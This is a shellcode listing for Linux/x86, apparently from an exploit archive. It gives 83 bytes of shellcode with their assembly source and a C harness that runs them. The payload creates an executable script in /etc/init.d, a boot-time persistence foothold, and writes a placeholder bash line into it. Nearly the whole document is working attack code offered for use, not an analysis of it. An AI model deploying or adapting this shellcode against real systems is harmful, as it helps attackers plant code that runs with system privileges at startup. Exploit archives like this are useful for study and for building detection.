linux/x86 /etc/init.d shellcode 83 bytes

========================================
linux/x86 /etc/init.d shellcode 83 bytes
========================================


# Exploit Title: /etc/init.d shellcode 83 bytes
# Author: nex
# Software Link: N/A
# Version: N/A
# Category: shellcode
# Tested on: Linux/x86 2.6.27-9-generic

/* copy in /etc/init.d shellcode */
/* 83 bytes lenght */

/*
.text
	.globl _start
_start:
	xor	%eax,%eax
	xor	%ebx,%ebx

	push	$0x4168732E
	push	$0x4168732D
	push	$0x74696E69
	push	$0x2F642E74
	push	$0x696E692F
	push	$0x6374652F

	movl	%esp, %ebx
	movb	%al,23(%ebx)

	movb	$0x5,%al
	movb	$( 0x40 | 0x1 ), %cl

	movl	$0x41414141,%edx
	xorl	$0x414140bc,%edx

#	movl $0x1fd, %edx

# open( "/etc/init.d/init-shellA.sh", O_WRONLY | O_CREAT, 0775 );
	int	$0x80

	jmp	shellcode

write:
	pop	%ecx

	movl %eax,%ebx

	xor	%eax,%eax
	movb	$0x4,%al
	xor	%edx,%edx
	movb $0x13, %dl

# write( initd, shellcode, size_of_shellcode )
	int	$0x80

# _exit( 0 );
	xor	%eax,%eax
	xorb	%bl,%bl
	inc	%eax

	int	$0x80
	
shellcode:
	call write
	.ascii "#!/bin/bash\necho we"
*/

char payload[] = "\x31\xc0\x31\xdb\x68\x2e\x73\x68"
		 "\x41\x68\x2d\x73\x68\x41\x68\x69"
		 "\x6e\x69\x74\x68\x74\x2e\x64\x2f"
		 "\x68\x2f\x69\x6e\x69\x68\x2f\x65"
		 "\x74\x63\x89\xe3\x88\x43\x17\xb0"
		 "\x05\xb1\x41\xba\x41\x41\x41\x41"
		 "\x81\xf2\xbc\x40\x41\x41\xcd\x80"
		 "\xeb\x14\x59\x89\xc3\x31\xc0\xb0"
		 "\x04\x31\xd2\xb2\x13\xcd\x80\x31"
		 "\xc0\x30\xdb\x40\xcd\x80\xe8\xe7"
		 "\xff\xff\xff"
		 "#!/bin/bash\necho we";

int
main()
{
	((void(*)())payload)();

	return 0;
}



#  0day.today [2018-01-05]  #